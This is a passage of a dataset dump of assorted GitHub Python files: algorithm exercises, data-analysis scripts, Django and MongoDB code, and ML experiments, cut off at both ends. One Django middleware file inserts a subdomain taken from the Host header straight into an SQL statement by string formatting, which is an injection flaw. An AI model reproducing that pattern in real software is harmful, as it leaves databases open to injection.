[i + 1, mid + 1]\n elif numbers[mid] < tmp:\n left = mid + 1\n else:\n right = mid - 1\n # Time Complexity: O(NlogN)\n # Space Complexity: O(1)\n\n\nprint(Solution().twoSum([2, 3, 4], 6))\n","repo_name":"thehaung/DSnA","sub_path":"Python/binary_search/two-sum-ii-input-array-is-sorted.py","file_name":"two-sum-ii-input-array-is-sorted.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36679135519","text":"import itertools\nimport time\nimport sys\nimport math\nT1 = time.time()\n\ndef primenumbers(L):\n notprimes = set()\n primes = []\n for counter in range(2,L):\n if counter in notprimes: \n continue\n \n for j in range(counter*counter,L+1,counter):\n notprimes.add(j)\n \n primes.append(counter)\n return primes \n \npriem = primenumbers(int(math.sqrt(float(987654321))))\npriem_num = len(priem)\nT2 = time.time()\ndef perms(n):\n ans = []\n x = list(itertools.permutations(str(n)))\n for verz in x:\n getal = \"\"\n for num in verz:\n getal += num\n ans.append(int(getal))\n return list(reversed(ans))\nx = perms(1234567)\n\nprint(T2-T1)\n\nfor i in x:\n for j in priem:\n if(i / j == int(i/j)):\n print(i)\n break\n if(j > math.sqrt(float(i))):\n print(i / j)\n print(i)\n sys.exit(0)\n \nT3 = time.time()\nprint(T3-T2)","repo_name":"CasperHagenaars/WISB256","sub_path":"Euler Challenge/Euler41.py","file_name":"Euler41.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39722910773","text":"from django.db import connection\n\nclass Subdomains:\n def process_request(self, request):\n \"\"\"Inject subdomain information into request\"\"\"\n host = request.get_host()\n parts = host.split('.')\n if len(parts) > 2:\n subdomain = u'.'.join(parts[:-2])\n try:\n from django.conf.settings import MAIN_SUBDOMAIN\n if subdomain in MAIN_SUBDOMAIN:\n subdomain = None\n except ImportError:\n pass\n else:\n subdomain = None\n request.subdomain = subdomain\n schema = 'account_%s' % subdomain\n cursor = connection.cursor()\n cursor.execute(\"SET search_path TO %s, public\" % schema)\n return None\n","repo_name":"marcua/qurk_experiments","sub_path":"qurkexp/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"18181837313","text":"import random\nimport requests\n\ndef createExperiment(host, groupExp, allExperimentPartitionIDConditionPair):\n url = f\"http://{host}/api/experiments\"\n # context = [\"assign-prog\", \"app\", \"addition\"]\n context = [\"addition\"]\n states = [\"enrolling\"]\n postExperimentRules = [\"assign\", \"continue\"]\n\n if( groupExp == True):\n # parameters for group experiment testing:\n consistencyRules = [\"group\"]\n asssignmentUnits = [\"group\"]\n groups = [\"classId\"]\n \n else:\n # parameters for individual experiment testing:\n consistencyRules = [\"individual\"]\n asssignmentUnits = [\"individual\"]\n groups = [\"class\", \"school\", \"district\", \"teacher\"]\n \n # random ids upto:\n n = 100\n # assignment weight for 1st condition: (1-100):\n weight = 50\n\n conditionCode1 = \"c\" + str(random.randint(1,n))\n conditionCode2 = \"c\" + str(random.randint(1,n))\n expId1 = \"id\" + str(random.randint(1,n))\n expPoint1 = \"p\" + str(random.randint(1,n))\n expId2 = \"id\" + str(random.randint(1,n))\n expPoint2 = \"p\" + str(random.randint(1,n))\n\n PartitionIDConditionPair1 = {\"experimentPoint\": expPoint1, \"partitionId\" : expId1, \"condition\" : conditionCode1}\n PartitionIDConditionPair2 = {\"experimentPoint\": expPoint2, \"partitionId\" : expId2, \"condition\" : conditionCode2}\n allExperimentPartitionIDConditionPair.append(PartitionIDConditionPair1)\n allExperimentPartitionIDConditionPair.append(PartitionIDConditionPair2)\n\n # JSON data for creating an experiment:\n data = {\n \"name\": \"TestExp\"+ str(random.randint(1,n)),\n \"description\": \"Test experiment is created here\",\n \"consistencyRule\": random.choice(consistencyRules),\n \"assignmentUnit\": random.choice(asssignmentUnits),\n \"group\": random.choice(groups),\n \"postExperimentRule\": random.choice(postExperimentRules),\n \"state\": random.choice(states),\n \"tags\": [\"Workspace\", \"Content\"],\n \"context\": [random.choice(context)],\n \"conditions\": [\n {\n \"name\": \"condition1\",\n \"description\": \"condition description 1\",\n \"assignmentWeight\": weight,\n \"conditionCode\": conditionCode1\n },\n {\n \"name\": \"condition2\",\n \"description\": \"condition description 2\",\n \"assignmentWeight\": 100-weight,\n # \"conditionCode\": random.choice(conditionCodes)\n \"conditionCode\": conditionCode2\n }\n ],\n \"partitions\": [\n {\n \"name\": expPoint1,\n \"expId\": expId1,\n \"expPoint\": expPoint1,\n \"description\": expId1\n },\n {\n \"name\": expPoint2,\n \"expId\": expId2,\n \"expPoint\": expPoint2,\n \"description\": expId2\n }\n ]\n }\n\n response = requests.post(url, json = data)\n if response.status_code != 200:\n print(f\"createExperiment Failed with {response.status_code}\")\n else:\n print(\"New Experiment is created\")\n \n return allExperimentPartitionIDConditionPair","repo_name":"CarnegieLearningWeb/educational-experiment-service","sub_path":"locust/createExperiment.py","file_name":"createExperiment.py","file_ext":"py","file_size_in_byte":3192,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"23593054698","text":"#!/usr/bin/env python3\n\nimport pandas as pd\nfrom pprint import pprint\nfrom pathlib import Path\n\n\ndef main():\n \"\"\"\n Using pathlib library to read in file assuming file and program store in same location\n \"\"\"\n cwd = Path.cwd()\n\n pth = cwd / 'featuresdf.csv'\n\n # Load data\n df = pd.read_csv(\"featuresdf.csv\")\n\n zip_df = zip(df.artists, df.name)\n\n print(\"-----Part 1-----\")\n # Part 1 -- Generators\n print(''.join([f'{artist}, {name}\\n' for artist, name in zip_df if artist == 'Ed Sheeran']), end=' ')\n\n # Part 2 -- closure\n def music_function(df):\n \n def get_music(level):\n return ''.join([f'{artist}, {name}, {energy:.1f}\\n' for artist, name, energy in df if energy > level])\n\n return get_music\n\n\n print(\"\\n-----Part 2-----\")\n\n dataset = zip(df.artists, df.name, df.energy)\n\n music_level = music_function(dataset)\n print(music_level(0.8))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"UWPCE-PythonCert-ClassRepos/Sp2018-Online","sub_path":"students/Gabe_Lamberth/lesson02/music_gen.py","file_name":"music_gen.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27184753527","text":"from dotenv import load_dotenv\nfrom pymongo import MongoClient, ReadPreference\n\nload_dotenv()\n\n\nclass PokemonRepository:\n def __init__(self, mongo_url, db_name, coll_name):\n self.client = MongoClient(mongo_url)\n self.db = self.client[db_name]\n self.collection = self.db.get_collection(coll_name)\n\n def find(self, projection=None, skip=0, limit=0, filter=None, sort=None):\n return self.collection.find(\n projection=projection, skip=skip, limit=limit, filter=filter, sort=sort\n )\n\n def list_databases(self):\n print(self.client.list_database_names())\n\n def count(self):\n return self.collection.count_documents({})\n\n def insert_one(self, document):\n return self.collection.insert_one(document)\n\n def insert_many(self, documents):\n return self.collection.insert_many(documents)\n\n def insert_many_with_transaction(self, documents):\n with self.client.start_session() as session:\n with session.start_transaction():\n self.collection.insert_many(documents, session=session)\n\n def create_collection(self):\n self.collection.drop()\n pokemon_schema = {\n \"bsonType\": \"object\",\n \"required\": [\"no\", \"name\", \"form\", \"isMegaEvolution\", \"types\"],\n \"properties\": {\n \"no\": {\n \"bsonType\": \"int\"\n },\n \"name\": {\n \"bsonType\": \"string\"\n },\n \"form\": {\n \"bsonType\": \"string\"\n },\n \"isMegaEvolution\": {\n \"bsonType\": \"bool\"\n },\n \"types\": {\n \"bsonType\": \"array\"\n }\n }\n }\n self.db.create_collection(\"pokemon\", validator={\"$jsonSchema\": pokemon_schema})\n","repo_name":"misaosyushi/mongo-exercise","sub_path":"pokemon_repository.py","file_name":"pokemon_repository.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29912862689","text":"#!/usr/bin/python3\r\n###########################################################\r\n# For rodent exomes, 03.2021\r\n# Simply counts all the Ns and heterozygous sites in each\r\n# exome assembly\r\n###########################################################\r\n\r\nimport sys, os, core, math, argparse, subprocess, multiprocessing as mp\r\n\r\n###########################################################\r\n\r\nasmdir = \"../01-Assembly-data/10-Varcall/\";\r\noutfilename = \"logs/count-ns.csv\";\r\n\r\nwith open(outfilename, \"w\") as outfile:\r\n headers = [\"sample\", \"contig\", \"length\", \"Ns\", \"hets\", \"softmasked\"];\r\n outfile.write(\",\".join(headers) + \"\\n\");\r\n for sample in os.listdir(asmdir):\r\n print(\"# Reading sample:\", sample);\r\n asmfile = os.path.join(asmdir, sample, sample + \"-iupac-consensus.fa\");\r\n contigs = core.fastaGetDict(asmfile);\r\n print(\"# \", len(contigs), \"contigs read.\");\r\n\r\n for contig in contigs:\r\n #print(contig);\r\n\r\n sample_dict = { contig : {'Ns' : 0, 'hets' : 0, 'softmasked' : 0} };\r\n seq = contigs[contig];\r\n\r\n ns = seq.count(\"N\") + seq.count(\"n\");\r\n hets = sum( [ seq.count(base) for base in \"RYSWKMBDHVryswkmbdhv\" ] );\r\n soft = sum( [ 1 for base in seq if base.islower() ] );\r\n\r\n outline = [ sample, contig.split(\" \")[0][1:], str(len(seq)), str(ns), str(hets), str(soft) ];\r\n outfile.write(\",\".join(outline) + \"\\n\");\r\n\r\n\r\n\r\n\r\n","repo_name":"goodest-goodlab/murinae-seq","sub_path":"01-Assembly/scripts/count_ns.py","file_name":"count_ns.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"69943680109","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 8 01:09:35 2023\n\n@author: green-machine\n\"\"\"\n\n\nimport numpy as np\nfrom sklearn.datasets import load_iris\nfrom sklearn.model_selection import (ShuffleSplit, cross_val_score,\n train_test_split)\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.svm import SVC\n\n\ndef custom_cv_2folds(X: np.ndarray) -> tuple[np.ndarray]:\n \"\"\"\n http://scikit-learn.org/stable/modules/cross_validation.html\n\n Parameters\n ----------\n X : np.ndarray\n DESCRIPTION.\n\n Yields\n ------\n idx : TYPE\n DESCRIPTION.\n idx : TYPE\n DESCRIPTION.\n\n \"\"\"\n n = X.shape[0]\n _ = 1\n while _ <= 2:\n idx = np.arange(n * (_ - 1) / 2, n * _ / 2, dtype=int)\n yield idx, idx\n _ += 1\n\n\ndef main() -> None:\n # =========================================================================\n # Make Dataset\n # =========================================================================\n X, y = load_iris(return_X_y=True)\n\n X_train, X_test, y_train, y_test = train_test_split(\n X, y, test_size=.4, random_state=0\n )\n # =========================================================================\n # Support Vector Machine: Support Vector Classification\n # =========================================================================\n estimator = SVC(kernel='linear', C=1).fit(X_train, y_train)\n\n scores = cross_val_score(estimator, X, y, cv=5)\n print('Cross Validation: Base Scoring')\n print(f'Accuracy: {scores.mean():,.4f} (+/- {2 * scores.std():,.4f})')\n\n scores = cross_val_score(estimator, X, y, cv=5, scoring='f1_macro')\n print('Cross Validation: F1 Scoring')\n print(f'Accuracy: {scores.mean():,.4f} (+/- {2 * scores.std():,.4f})')\n\n cross_validator = ShuffleSplit(n_splits=5, test_size=.3, random_state=0)\n scores = cross_val_score(estimator, X, y, cv=cross_validator)\n print('Cross Validation: Shuffle Split')\n print(f'Accuracy: {scores.mean():,.4f} (+/- {2 * scores.std():,.4f})')\n\n cross_validator = custom_cv_2folds(X)\n scores = cross_val_score(estimator, X, y, cv=cross_validator)\n print('Cross Validation: Custom')\n print(f'Accuracy: {scores.mean():,.4f} (+/- {2 * scores.std():,.4f})')\n\n scaler = StandardScaler().fit(X_train)\n X_train_transformed = scaler.transform(X_train)\n estimator = SVC(C=1).fit(X_train_transformed, y_train)\n X_test_transformed = scaler.transform(X_test)\n scores = estimator.score(X_test_transformed, y_test)\n print('Cross Validation: Standard Scaler')\n print(f'Accuracy: {scores.mean():,.4f} (+/- {2 * scores.std():,.4f})')\n\n estimator = make_pipeline(StandardScaler(), SVC(C=1))\n cross_validator = ShuffleSplit(n_splits=5, test_size=.3, random_state=0)\n scores = cross_val_score(estimator, X, y, cv=cross_validator)\n print('Cross Validation: Composite Estimator')\n print(f'Accuracy: {scores.mean():,.4f} (+/- {2 * scores.std():,.4f})')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"avtomatik/sklearn","sub_path":"src/iris_cross_validation.py","file_name":"iris_cross_validation.py","file_ext":"py","file_size_in_byte":3104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3815456531","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Course',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=72)),\n ('credit_hours', models.IntegerField()),\n ('course_id', models.CharField(max_length=10)),\n ('course_number', models.IntegerField()),\n ],\n ),\n migrations.CreateModel(\n name='Department',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=72)),\n ],\n ),\n migrations.CreateModel(\n name='Instructor',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('first_name', models.CharField(max_length=72)),\n ('last_name', models.CharField(max_length=72)),\n ('email', models.EmailField(max_length=254)),\n ],\n ),\n migrations.CreateModel(\n name='Student',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('first_name', models.CharField(max_length=72)),\n ('last_name', models.CharField(max_length=72)),\n ('email', models.EmailField(max_length=254)),\n ],\n ),\n migrations.AddField(\n model_name='course',\n name='department',\n field=models.ForeignKey(related_name='courses', to='mainapp.Department'),\n ),\n migrations.AddField(\n model_name='course',\n name='instructor',\n field=models.ForeignKey(related_name='courses', to='mainapp.Instructor'),\n ),\n migrations.AddField(\n model_name='course',\n name='students',\n field=models.ManyToManyField(related_name='courses', to='mainapp.Student'),\n ),\n ]\n","repo_name":"dallinskinner/DjangoTestingExample","sub_path":"mainapp/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23767767574","text":"import pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom scipy.stats import f_oneway, ttest_ind, chi2_contingency, ttest_1samp\nfrom statsmodels.stats.multicomp import pairwise_tukeyhsd\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.preprocessing import LabelEncoder\n\nstudents_performance = pd.read_csv('data/StudentsPerformance.csv')\npd.set_option('display.max_columns', None)\n\n#Inspecting first 5 rows of the data\nprint(students_performance.head(), '\\n')\nscores = ['math score', 'reading score', 'writing score']\n\n#Dataframe info\nprint(students_performance.info(), '\\n')\n\n#Proportions of specific categorical data\ngender_proportion = students_performance[\"gender\"].value_counts().reset_index()\nrace_proportion = students_performance[\"race/ethnicity\"].value_counts().reset_index()\npreparation_proportion = students_performance[\"test preparation course\"].value_counts().reset_index()\nlunch_proportion = students_performance[\"lunch\"].value_counts().reset_index()\nparental_education_proportion = students_performance[\"parental level of education\"].value_counts().reset_index()\nproportions = [gender_proportion, race_proportion, preparation_proportion, lunch_proportion, parental_education_proportion]\n\nplt.figure(figsize=(12, 6))\nfor i, proportion in enumerate(proportions):\n plt.subplot(1, 5, i+1)\n plt.title(f'{proportion.columns[-1]} proportion')\n plt.pie(proportion.iloc[:, 1], autopct='%d%%')\n plt.axis('equal')\n plt.legend(proportion.iloc[:, 0])\nplt.tight_layout()\nplt.show()\n\n#Visualize math, reading and writing score depending on ethnitical group, gender, test preparation courses, parental level of education and lunch\ndependencies = ['race/ethnicity', 'gender', 'test preparation course', 'parental level of education', 'lunch']\nfor result in scores:\n plt.figure(figsize=(18, 9))\n for count, dependence in enumerate(dependencies):\n plt.subplot(1, 5, count+1)\n sns.barplot(y=result, data=students_performance, x=dependence)\n plt.title(f'{result} vs {dependence}')\n plt.xticks(rotation=-15)\n plt.tight_layout()\n plt.show()\n\n#Visualise distribution of scores dependent on gender, test preparation and ethnitical groups\ndependencies = ['race/ethnicity', 'gender', 'test preparation course']\nfor result in scores:\n plt.figure(figsize=(18, 9))\n for count, dependence in enumerate(dependencies):\n plt.subplot(1, 3, count + 1)\n sns.kdeplot(result, data=students_performance, hue=dependence, shade=True)\n plt.title(f'{result} vs {dependence}')\n sns.despine()\n plt.tight_layout()\n plt.show()\n\n#\ncompleted_preparation = students_performance[students_performance['test preparation course'] == 'completed']\nnone_preparation = students_performance[students_performance['test preparation course'] == 'none']\n\nmale_performance = students_performance[students_performance['gender'] == 'male']\nfemale_performance = students_performance[students_performance['gender'] == 'female']\n\ngroupA_performance = students_performance[students_performance['race/ethnicity'] == 'group A']\ngroupB_performance = students_performance[students_performance['race/ethnicity'] == 'group B']\ngroupC_performance = students_performance[students_performance['race/ethnicity'] == 'group C']\ngroupD_performance = students_performance[students_performance['race/ethnicity'] == 'group D']\ngroupE_performance = students_performance[students_performance['race/ethnicity'] == 'group E']\n\n#Check difference in standard deviation in scores of gender\nmale_scores_std = np.std(male_performance)\nfemale_scores_std = np.std(female_performance)\ndifference_scores_std_gender = abs(male_scores_std - female_scores_std)\nprint('Difference of standard deviation of genders:\\n', difference_scores_std_gender, '\\n') ## Standart deviation of scores are about to be the same\n\n#Check difference in standard deviation in scores of courses\ncompleted_preparation_scores_std = np.std(completed_preparation)\nnone_preparation_scores_std = np.std(none_preparation)\ndifference_scores_std_courses = abs(completed_preparation_scores_std - none_preparation_scores_std)\nprint('Difference of standard deviation of courses:\\n', difference_scores_std_courses, '\\n') ##Standard deviation of scores are about to be the same except writing scores (1.63 difference)\n\n#Check difference in standard deviation in scores of race groups\ngroupA_scores_std = np.std(groupA_performance)\ngroupB_scores_std = np.std(groupB_performance)\ngroupC_scores_std = np.std(groupC_performance)\ngroupD_scores_std = np.std(groupD_performance)\ngroupE_scores_std = np.std(groupE_performance)\ndifference_scores_std_race = abs(groupE_scores_std - groupA_scores_std - groupD_scores_std - groupC_scores_std - groupB_scores_std)\nprint('Difference of standard deviation of races:\\n', difference_scores_std_race, '\\n') #There is a big difference in spread, so we can not check hypothesis on this data\n\n#Testing association between test preparation and scores\ncompleted_preparation = students_performance[students_performance['test preparation course'] == 'completed']\nnone_preparation = students_performance[students_performance['test preparation course'] == 'none']\n\n#Math score and test prep\ntstat, test_prep_pval = ttest_ind(completed_preparation[scores], none_preparation[scores])\nprint('''\nH0 - mean score of students who completed course and not are the same.\nHA - mean score of students who completed course and not are not the same.\n''')\nfor score, result in enumerate(test_prep_pval):\n if result < 0.05:\n print(f'For {scores[score]} we accept that they have different mean score.')\n else:\n print(f'For {scores[score]} we accept that they have the same mean score.')\n\n### THERE IS A BIG DIFFERENCE IN MEAN SCORES OF STUDENT WHO COMPLETED EXTRA COURSES AND NOT ###\n#Inspecting the mean values of student who completed course and not completed\ncompleted_preparation_scores_mean = np.mean(completed_preparation)\nnone_preparation_scores_mean = np.mean(none_preparation)\nprint(f'Mean for students who completed courses\\n{completed_preparation_scores_mean}\\nMean for those who not completed courses\\n{none_preparation_scores_mean}')\n#In average those students who completed courses has more scores than those who does not complete courses\n\n#Check association between gender and test results\n#Math score and test gender\ntstat, gender_scores_pval = ttest_ind(male_performance[scores], female_performance[scores])\nprint('''\nH0 - mean score of students of both genders are the same.\nHA - mean score of students of both genders are not the same.\n''')\nfor score, result in enumerate(gender_scores_pval):\n if result < 0.05:\n print(f'For {scores[score]} we accept that both genders have different mean score.')\n else:\n print(f'For {scores[score]} we accept that both genders have the same mean score.')\n\n### BOTH GENDERS HAVE DIFFERENT SCORES\n#Inspecting mean value of scores by genders\nmale_scores_mean = np.mean(male_performance)\nfemale_scores_mean = np.mean(female_performance)\nprint(f'Mean of scores for male \\n{completed_preparation_scores_mean}\\nMean of scores for female \\n{none_preparation_scores_mean}')\n#In average male student have more math score but have less reading and writing score\n\n#Cross tabulation of race/ethnicity and parental level of education\nrace_education_tab = pd.crosstab(students_performance['race/ethnicity'], students_performance['parental level of education'])\n#Association between race/ethnicity and parental level of education\nchi2, race_education_pval, dof, exp = chi2_contingency(race_education_tab)\nprint('''\nH0 - there is an association parental level of education and ethnicity group.\nHA - there is no association between parental level of education and writing ethnicity group.\n''')\nresult = 'Reject H0' if race_education_pval < 0.05 else \"Accept H0\"\nprint(f\"Chi2: {chi2}, confident level: {race_education_pval}\\n\")\nprint(result) ## There is an association in this parameters\n\n#What is the most influenced parameters for scores\nplt.figure(figsize=(18, 9))\nfor i, score in enumerate(scores):\n feature_set = students_performance.drop(scores, axis=1)\n for column in feature_set.columns:\n encoder = LabelEncoder()\n feature_set[column] = encoder.fit_transform(feature_set[column])\n target = students_performance[score]\n linear_model = LinearRegression().fit(feature_set, target)\n ax = plt.subplot(1, 3, i+1)\n coefficients = abs(linear_model.coef_)\n x_values = range(len(coefficients))\n plt.bar(x_values, coefficients)\n plt.title(f'Influence of Parameter by Linear Regression for {score}')\n plt.ylabel('Coefficients')\n plt.xlabel('Parameters')\n plt.xticks(rotation=-15)\n ax.set_xticks(x_values)\n ax.set_xticklabels(feature_set.columns)\nplt.tight_layout()\nplt.show()\n\n\n","repo_name":"VolodymyrBrintsov/Students-Performance-in-Exams","sub_path":"analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":8836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24789421601","text":"\"\"\"Tests for segmentation_datasets.\"\"\"\n\nfrom absl.testing import absltest\nfrom absl.testing import parameterized\nimport jax\nimport ml_collections\nfrom scenic.projects.robust_segvit.datasets import segmentation_datasets\n\nEXPECTED_DATASETS = [\n ('ade20k', 'ade20k', 'validation'),\n]\n\n\nclass SegmentationVariantsTest(parameterized.TestCase):\n\n @parameterized.named_parameters(EXPECTED_DATASETS)\n def test_available(self, name, val_split):\n \"\"\"Test we can load a corrupted dataset.\"\"\"\n num_shards = jax.local_device_count()\n config = ml_collections.ConfigDict()\n config.batch_size = num_shards*2\n config.eval_batch_size = num_shards*2\n config.num_shards = num_shards\n\n config.rng = jax.random.PRNGKey(0)\n config.dataset_configs = ml_collections.ConfigDict()\n config.dataset_configs.train_target_size = (120, 120)\n config.dataset_configs.name = name\n config.dataset_configs.denoise = None\n config.dataset_configs.use_timestep = 0\n config.dataset_configs.val_split = val_split\n dataset = segmentation_datasets.get_dataset(**config)\n batch = next(dataset.valid_iter)\n self.assertEqual(\n batch['inputs'].shape,\n (num_shards, config.eval_batch_size // num_shards, 120, 120, 3))\n\n\nif __name__ == '__main__':\n absltest.main()\n","repo_name":"google-research/scenic","sub_path":"scenic/projects/robust_segvit/tests/segmentation_datasets_test.py","file_name":"segmentation_datasets_test.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","stars":2619,"dataset":"github-code","pt":"37"} +{"seq_id":"43299152886","text":"#3 sets of fruits.and then finding:repeated , unique and unrepeated items\na={'apple','orange','banana','pineapple'}\nb={'watermelon,guava','peach','apple'}\nc={'apple','mango',\"guava\"}\nz=(a.intersection(b,c))\ny=(a.difference(b,c))\nx=(a.union(b,c))\nw=(x.difference(z))\nprint(\"reapeated items\",z)\nprint(\"unique items\",w)\nprint(\"unrepeated items\",x)\n\n\n\n","repo_name":"Sohail7699/python-programs","sub_path":"sets/sets.py","file_name":"sets.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22185770435","text":"__author__ = 'xilin'\nfrom dice import Dice\nimport thinkplot\n\nclass Train(Dice):\n \"\"\"Represents hypotheses about how many trains the company has.\n The likelihood function for the train problem is the same as\n for the Dice problem.\n \"\"\"\n\n\ndef main():\n hypos = range(1, 1001)\n suite = Train(hypos)\n\n suite.Update(60)\n print(suite.Mean())\n\n thinkplot.PrePlot(1)\n thinkplot.Pmf(suite)\n thinkplot.Save(root='train1',\n xlabel='Number of trains',\n ylabel='Probability',\n formats=['pdf', 'eps'])\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"yydxlv/Bayes_Insights","sub_path":"火车头问题.py","file_name":"火车头问题.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"14313808238","text":"\nimport numpy as np\n\ndef load_terrain(fname):\n terrain = np.genfromtxt(fname, dtype=str, delimiter=1)\n terrain = np.vectorize(ord)(terrain)\n start = next(zip(*np.where(terrain == ord('S'))))\n goal = next(zip(*np.where(terrain == ord('E'))))\n terrain[start] = ord('a')\n terrain[goal] = ord('z')\n return terrain, start, goal\n\ndef find_shortest_path(terrain, start, goal):\n pathlens = -np.ones_like(terrain)\n pathlens[start] = 0\n feelers = [np.array(start)]\n while pathlens[goal] == -1:\n pos = feelers.pop(0)\n for neighbor in [pos + [1, 0],\n pos + [0, 1],\n pos + [-1, 0],\n pos + [0, -1]]:\n if np.any(neighbor < 0) or np.any(neighbor >= pathlens.shape):\n continue\n if pathlens[tuple(neighbor)] != -1:\n continue\n if terrain[tuple(neighbor)] > terrain[tuple(pos)] + 1:\n continue\n pathlens[tuple(neighbor)] = pathlens[tuple(pos)] + 1\n feelers.append(neighbor)\n return pathlens[goal]\n\ndef find_shortest_apath(terrain, _, goal):\n pathlens = -np.ones_like(terrain)\n pathlens[goal] = 0\n feelers = [np.array(goal)]\n while feelers:\n pos = feelers.pop(0)\n for neighbor in [pos + [1, 0],\n pos + [0, 1],\n pos + [-1, 0],\n pos + [0, -1]]:\n if np.any(neighbor < 0) or np.any(neighbor >= pathlens.shape):\n continue\n if pathlens[tuple(neighbor)] != -1:\n continue\n if terrain[tuple(neighbor)] < terrain[tuple(pos)] - 1:\n continue\n if terrain[tuple(neighbor)] == ord('a'):\n return pathlens[tuple(pos)] + 1\n pathlens[tuple(neighbor)] = pathlens[tuple(pos)] + 1\n feelers.append(neighbor)\n\nif __name__ == '__main__':\n testterrain = load_terrain('testinput')\n terrain = load_terrain('input')\n\n assert find_shortest_path(*testterrain) == 31\n print(find_shortest_path(*terrain))\n\n assert find_shortest_apath(*testterrain) == 29\n print(find_shortest_apath(*terrain))\n","repo_name":"schtandard/adventofcode2022","sub_path":"12/aoc2022_12.py","file_name":"aoc2022_12.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32388243796","text":"import numpy as np\nimport sys\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.svm import SVR\nfrom joblib import dump, load\nimport matplotlib.pyplot as plt\nfrom sklearn.svm import LinearSVR\nfrom mpl_toolkits.axes_grid1.inset_locator import inset_axes\n\nplt.rcParams.update({'font.size': 22})\n\nviscos=1/5200\n\nplt.close('all')\nplt.interactive(True)\n\n# load DNS data\nDNS_mean=np.genfromtxt(\"LM_Channel_5200_mean_prof.dat\",comments=\"%\")\ny_DNS=DNS_mean[:,0]\nyplus_DNS=DNS_mean[:,1]\nu_DNS=DNS_mean[:,2]\ndudy_DNS=np.gradient(u_DNS,y_DNS)\n\nDNS_stress=np.genfromtxt(\"LM_Channel_5200_vel_fluc_prof.dat\",comments=\"%\")\nuu_DNS=DNS_stress[:,2]\nvv_DNS=DNS_stress[:,3]\nww_DNS=DNS_stress[:,4]\nuv_DNS=DNS_stress[:,5]\nk_DNS=0.5*(uu_DNS+vv_DNS+ww_DNS)\n\nDNS_RSTE=np.genfromtxt(\"LM_Channel_5200_RSTE_k_prof.dat\",comments=\"%\")\neps_DNS=DNS_RSTE[:,7]/viscos # it is scaled with ustar**4/viscos\n\n# fix wall\neps_DNS[0]=eps_DNS[1]\nvist_DNS=abs(uv_DNS)/dudy_DNS\n\n# load data from k-omega RANS\ndata = np.loadtxt('y_u_k_om_uv_5200-RANS-code.dat')\ny_rans = data[:,0]\nk_rans = data[:,2]\n# interpolate to DNS grid\nk_rans_DNS=np.interp(y_DNS, y_rans, k_rans)\n\n\n# vist and diss of k-omega model agree well with DNS, but not k. Hence omega is taken from diss and vist\n# vist = cmu*k**2/eps\n# omega = eps/k = eps/(vist*eps/cmu)**0.5 = (eps/vist/cmu)**0.5\nomega_DNS=(eps_DNS/0.09/vist_DNS)**0.5\n\n\n# turbulence model: uv = -cmu*k/omega*dudy => cmu=-uv/(k*dudy)*omega\n# Input data: dudy, vist\n# output, to be predicted: uv. interpolate to k-omega grid\nuv_all_data = np.abs(uv_DNS)\n\n# input dudy, vist\ndudy_all_data=dudy_DNS\nvist_all_data = vist_DNS\n\n# choose values for 30 < y+ < 1000\nindex_choose=np.nonzero((yplus_DNS > 30 ) & (yplus_DNS< 1000 ))\nyplus_DNS=yplus_DNS[index_choose]\ndudy_all_data= dudy_all_data[index_choose]\nvist_all_data = vist_all_data[index_choose]\nuv_all_data = uv_all_data[index_choose]\n# ....... do this for all varibles\n\n# create indices for all data\nindex= np.arange(0,len(uv_all_data), dtype=int)\n\n# number of elements of test data, 20%\nn_test=int(0.2*len(uv_all_data))\n\n# pick 20% elements randomly (test 